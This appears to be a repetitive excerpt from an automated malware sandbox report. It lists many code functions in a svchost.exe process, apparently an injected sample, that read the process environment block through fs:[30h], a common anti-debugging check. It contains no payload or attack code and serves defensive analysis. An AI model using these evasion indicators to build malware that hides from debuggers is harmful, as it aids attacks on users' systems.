Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0304260B mov eax, dword ptr fs:[00000030h] | 4_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0304260B mov eax, dword ptr fs:[00000030h] | 4_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0304260B mov eax, dword ptr fs:[00000030h] | 4_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03072619 mov eax, dword ptr fs:[00000030h] | 4_2_03072619
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0304E627 mov eax, dword ptr fs:[00000030h] | 4_2_0304E627
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03066620 mov eax, dword ptr fs:[00000030h] | 4_2_03066620
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03068620 mov eax, dword ptr fs:[00000030h] | 4_2_03068620
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0303262C mov eax, dword ptr fs:[00000030h] | 4_2_0303262C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0304C640 mov eax, dword ptr fs:[00000030h] | 4_2_0304C640
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030F866E mov eax, dword ptr fs:[00000030h] | 4_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030F866E mov eax, dword ptr fs:[00000030h] | 4_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306A660 mov eax, dword ptr fs:[00000030h] | 4_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306A660 mov eax, dword ptr fs:[00000030h] | 4_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03062674 mov eax, dword ptr fs:[00000030h] | 4_2_03062674
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03034690 mov eax, dword ptr fs:[00000030h] | 4_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03034690 mov eax, dword ptr fs:[00000030h] | 4_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306C6A6 mov eax, dword ptr fs:[00000030h] | 4_2_0306C6A6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030666B0 mov eax, dword ptr fs:[00000030h] | 4_2_030666B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306A6C7 mov ebx, dword ptr fs:[00000030h] | 4_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306A6C7 mov eax, dword ptr fs:[00000030h] | 4_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030AE6F2 mov eax, dword ptr fs:[00000030h] | 4_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030AE6F2 mov eax, dword ptr fs:[00000030h] | 4_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030AE6F2 mov eax, dword ptr fs:[00000030h] | 4_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030AE6F2 mov eax, dword ptr fs:[00000030h] | 4_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B06F1 mov eax, dword ptr fs:[00000030h] | 4_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B06F1 mov eax, dword ptr fs:[00000030h] | 4_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030C6500 mov eax, dword ptr fs:[00000030h] | 4_2_030C6500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03104500 mov eax, dword ptr fs:[00000030h] | 4_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03104500 mov eax, dword ptr fs:[00000030h] | 4_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03104500 mov eax, dword ptr fs:[00000030h] | 4_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03104500 mov eax, dword ptr fs:[00000030h] | 4_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03104500 mov eax, dword ptr fs:[00000030h] | 4_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03104500 mov eax, dword ptr fs:[00000030h] | 4_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03104500 mov eax, dword ptr fs:[00000030h] | 4_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03040535 mov eax, dword ptr fs:[00000030h] | 4_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03040535 mov eax, dword ptr fs:[00000030h] | 4_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03040535 mov eax, dword ptr fs:[00000030h] | 4_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03040535 mov eax, dword ptr fs:[00000030h] | 4_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03040535 mov eax, dword ptr fs:[00000030h] | 4_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03040535 mov eax, dword ptr fs:[00000030h] | 4_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0305E53E mov eax, dword ptr fs:[00000030h] | 4_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0305E53E mov eax, dword ptr fs:[00000030h] | 4_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0305E53E mov eax, dword ptr fs:[00000030h] | 4_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0305E53E mov eax, dword ptr fs:[00000030h] | 4_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0305E53E mov eax, dword ptr fs:[00000030h] | 4_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03038550 mov eax, dword ptr fs:[00000030h] | 4_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03038550 mov eax, dword ptr fs:[00000030h] | 4_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306656A mov eax, dword ptr fs:[00000030h] | 4_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306656A mov eax, dword ptr fs:[00000030h] | 4_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306656A mov eax, dword ptr fs:[00000030h] | 4_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03032582 mov eax, dword ptr fs:[00000030h] | 4_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03032582 mov ecx, dword ptr fs:[00000030h] | 4_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03064588 mov eax, dword ptr fs:[00000030h] | 4_2_03064588
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306E59C mov eax, dword ptr fs:[00000030h] | 4_2_0306E59C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B05A7 mov eax, dword ptr fs:[00000030h] | 4_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B05A7 mov eax, dword ptr fs:[00000030h] | 4_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B05A7 mov eax, dword ptr fs:[00000030h] | 4_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030545B1 mov eax, dword ptr fs:[00000030h] | 4_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030545B1 mov eax, dword ptr fs:[00000030h] | 4_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306E5CF mov eax, dword ptr fs:[00000030h] | 4_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306E5CF mov eax, dword ptr fs:[00000030h] | 4_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030365D0 mov eax, dword ptr fs:[00000030h] | 4_2_030365D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306A5D0 mov eax, dword ptr fs:[00000030h] | 4_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306A5D0 mov eax, dword ptr fs:[00000030h] | 4_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0305E5E7 mov eax, dword ptr fs:[00000030h] | 4_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0305E5E7 mov eax, dword ptr fs:[00000030h] | 4_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0305E5E7 mov eax, dword ptr fs:[00000030h] | 4_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0305E5E7 mov eax, dword ptr fs:[00000030h] | 4_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0305E5E7 mov eax, dword ptr fs:[00000030h] | 4_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0305E5E7 mov eax, dword ptr fs:[00000030h] | 4_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0305E5E7 mov eax, dword ptr fs:[00000030h] | 4_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0305E5E7 mov eax, dword ptr fs:[00000030h] | 4_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030325E0 mov eax, dword ptr fs:[00000030h] | 4_2_030325E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306C5ED mov eax, dword ptr fs:[00000030h] | 4_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306C5ED mov eax, dword ptr fs:[00000030h] | 4_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03068402 mov eax, dword ptr fs:[00000030h] | 4_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03068402 mov eax, dword ptr fs:[00000030h] | 4_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03068402 mov eax, dword ptr fs:[00000030h] | 4_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0302E420 mov eax, dword ptr fs:[00000030h] | 4_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0302E420 mov eax, dword ptr fs:[00000030h] | 4_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0302E420 mov eax, dword ptr fs:[00000030h] | 4_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0302C427 mov eax, dword ptr fs:[00000030h] | 4_2_0302C427
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B6420 mov eax, dword ptr fs:[00000030h] | 4_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B6420 mov eax, dword ptr fs:[00000030h] | 4_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B6420 mov eax, dword ptr fs:[00000030h] | 4_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B6420 mov eax, dword ptr fs:[00000030h] | 4_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B6420 mov eax, dword ptr fs:[00000030h] | 4_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B6420 mov eax, dword ptr fs:[00000030h] | 4_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B6420 mov eax, dword ptr fs:[00000030h] | 4_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306A430 mov eax, dword ptr fs:[00000030h] | 4_2_0306A430
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306E443 mov eax, dword ptr fs:[00000030h] | 4_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306E443 mov eax, dword ptr fs:[00000030h] | 4_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306E443 mov eax, dword ptr fs:[00000030h] | 4_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306E443 mov eax, dword ptr fs:[00000030h] | 4_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306E443 mov eax, dword ptr fs:[00000030h] | 4_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306E443 mov eax, dword ptr fs:[00000030h] | 4_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306E443 mov eax, dword ptr fs:[00000030h] | 4_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306E443 mov eax, dword ptr fs:[00000030h] | 4_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030EA456 mov eax, dword ptr fs:[00000030h] | 4_2_030EA456
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0302645D mov eax, dword ptr fs:[00000030h] | 4_2_0302645D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0305245A mov eax, dword ptr fs:[00000030h] | 4_2_0305245A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030BC460 mov ecx, dword ptr fs:[00000030h] | 4_2_030BC460
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0305A470 mov eax, dword ptr fs:[00000030h] | 4_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0305A470 mov eax, dword ptr fs:[00000030h] | 4_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0305A470 mov eax, dword ptr fs:[00000030h] | 4_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030EA49A mov eax, dword ptr fs:[00000030h] | 4_2_030EA49A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030364AB mov eax, dword ptr fs:[00000030h] | 4_2_030364AB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030644B0 mov ecx, dword ptr fs:[00000030h] | 4_2_030644B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030BA4B0 mov eax, dword ptr fs:[00000030h] | 4_2_030BA4B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030304E5 mov ecx, dword ptr fs:[00000030h] | 4_2_030304E5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030AEB1D mov eax, dword ptr fs:[00000030h] | 4_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030AEB1D mov eax, dword ptr fs:[00000030h] | 4_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030AEB1D mov eax, dword ptr fs:[00000030h] | 4_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030AEB1D mov eax, dword ptr fs:[00000030h] | 4_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030AEB1D mov eax, dword ptr fs:[00000030h] | 4_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030AEB1D mov eax, dword ptr fs:[00000030h] | 4_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030AEB1D mov eax, dword ptr fs:[00000030h] | 4_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030AEB1D mov eax, dword ptr fs:[00000030h] | 4_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030AEB1D mov eax, dword ptr fs:[00000030h] | 4_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0305EB20 mov eax, dword ptr fs:[00000030h] | 4_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0305EB20 mov eax, dword ptr fs:[00000030h] | 4_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030F8B28 mov eax, dword ptr fs:[00000030h] | 4_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030F8B28 mov eax, dword ptr fs:[00000030h] | 4_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030E4B4B mov eax, dword ptr fs:[00000030h] | 4_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030E4B4B mov eax, dword ptr fs:[00000030h] | 4_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030C6B40 mov eax, dword ptr fs:[00000030h] | 4_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030C6B40 mov eax, dword ptr fs:[00000030h] | 4_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030FAB40 mov eax, dword ptr fs:[00000030h] | 4_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030D8B42 mov eax, dword ptr fs:[00000030h] | 4_2_030D8B42
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030DEB50 mov eax, dword ptr fs:[00000030h] | 4_2_030DEB50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0302CB7E mov eax, dword ptr fs:[00000030h] | 4_2_0302CB7E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03040BBE mov eax, dword ptr fs:[00000030h] | 4_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03040BBE mov eax, dword ptr fs:[00000030h] | 4_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030E4BB0 mov eax, dword ptr fs:[00000030h] | 4_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030E4BB0 mov eax, dword ptr fs:[00000030h] | 4_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03050BCB mov eax, dword ptr fs:[00000030h] | 4_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03050BCB mov eax, dword ptr fs:[00000030h] | 4_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03050BCB mov eax, dword ptr fs:[00000030h] | 4_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03030BCD mov eax, dword ptr fs:[00000030h] | 4_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03030BCD mov eax, dword ptr fs:[00000030h] | 4_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03030BCD mov eax, dword ptr fs:[00000030h] | 4_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030DEBD0 mov eax, dword ptr fs:[00000030h] | 4_2_030DEBD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03038BF0 mov eax, dword ptr fs:[00000030h] | 4_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03038BF0 mov eax, dword ptr fs:[00000030h] | 4_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03038BF0 mov eax, dword ptr fs:[00000030h] | 4_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0305EBFC mov eax, dword ptr fs:[00000030h] | 4_2_0305EBFC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030BCBF0 mov eax, dword ptr fs:[00000030h] | 4_2_030BCBF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030BCA11 mov eax, dword ptr fs:[00000030h] | 4_2_030BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306CA24 mov eax, dword ptr fs:[00000030h]4_2_0306CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305EA2E mov eax, dword ptr fs:[00000030h]4_2_0305EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03054A35 mov eax, dword ptr fs:[00000030h]4_2_03054A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03054A35 mov eax, dword ptr fs:[00000030h]4_2_03054A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306CA38 mov eax, dword ptr fs:[00000030h]4_2_0306CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03036A50 mov eax, dword ptr fs:[00000030h]4_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03036A50 mov eax, dword ptr fs:[00000030h]4_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03036A50 mov eax, dword ptr fs:[00000030h]4_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03036A50 mov eax, dword ptr fs:[00000030h]4_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03036A50 mov eax, dword ptr fs:[00000030h]4_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03036A50 mov eax, dword ptr fs:[00000030h]4_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03036A50 mov eax, dword ptr fs:[00000030h]4_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040A5B mov eax, dword ptr fs:[00000030h]4_2_03040A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040A5B mov eax, dword ptr fs:[00000030h]4_2_03040A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306CA6F mov eax, dword ptr fs:[00000030h]4_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306CA6F mov eax, dword ptr fs:[00000030h]4_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306CA6F mov eax, dword ptr fs:[00000030h]4_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DEA60 mov eax, dword ptr fs:[00000030h]4_2_030DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030ACA72 mov eax, dword ptr fs:[00000030h]4_2_030ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030ACA72 mov eax, dword ptr fs:[00000030h]4_2_030ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303EA80 mov eax, dword ptr fs:[00000030h]4_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303EA80 mov eax, dword ptr fs:[00000030h]4_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303EA80 mov eax, dword ptr fs:[00000030h]4_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303EA80 mov eax, dword ptr fs:[00000030h]4_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303EA80 mov eax, dword ptr fs:[00000030h]4_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303EA80 mov eax, dword ptr fs:[00000030h]4_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303EA80 mov eax, dword ptr fs:[00000030h]4_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303EA80 mov eax, dword ptr fs:[00000030h]4_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303EA80 mov eax, dword ptr fs:[00000030h]4_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03104A80 mov eax, dword ptr fs:[00000030h]4_2_03104A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03068A90 mov edx, dword ptr fs:[00000030h]4_2_03068A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03038AA0 mov eax, dword ptr fs:[00000030h]4_2_03038AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03038AA0 mov eax, dword ptr fs:[00000030h]4_2_03038AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03086AA4 mov eax, dword ptr fs:[00000030h]4_2_03086AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03086ACC mov eax, dword ptr fs:[00000030h]4_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03086ACC mov eax, dword ptr fs:[00000030h]4_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03086ACC mov eax, dword ptr fs:[00000030h]4_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03030AD0 mov eax, dword ptr fs:[00000030h]4_2_03030AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03064AD0 mov eax, dword ptr fs:[00000030h]4_2_03064AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03064AD0 mov eax, dword ptr fs:[00000030h]4_2_03064AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306AAEE mov eax, dword ptr fs:[00000030h]4_2_0306AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306AAEE mov eax, dword ptr fs:[00000030h]4_2_0306AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AE908 mov eax, dword ptr fs:[00000030h]4_2_030AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AE908 mov eax, dword ptr fs:[00000030h]4_2_030AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030BC912 mov eax, dword ptr fs:[00000030h]4_2_030BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03028918 mov eax, dword ptr fs:[00000030h]4_2_03028918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03028918 mov eax, dword ptr fs:[00000030h]4_2_03028918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B892A mov eax, dword ptr fs:[00000030h]4_2_030B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C892B mov eax, dword ptr fs:[00000030h]4_2_030C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B0946 mov eax, dword ptr fs:[00000030h]4_2_030B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03056962 mov eax, dword ptr fs:[00000030h]4_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03056962 mov eax, dword ptr fs:[00000030h]4_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03056962 mov eax, dword ptr fs:[00000030h]4_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0307096E mov eax, dword ptr fs:[00000030h]4_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0307096E mov edx, dword ptr fs:[00000030h]4_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0307096E mov eax, dword ptr fs:[00000030h]4_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D4978 mov eax, dword ptr fs:[00000030h]4_2_030D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D4978 mov eax, dword ptr fs:[00000030h]4_2_030D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030BC97C mov eax, dword ptr fs:[00000030h]4_2_030BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
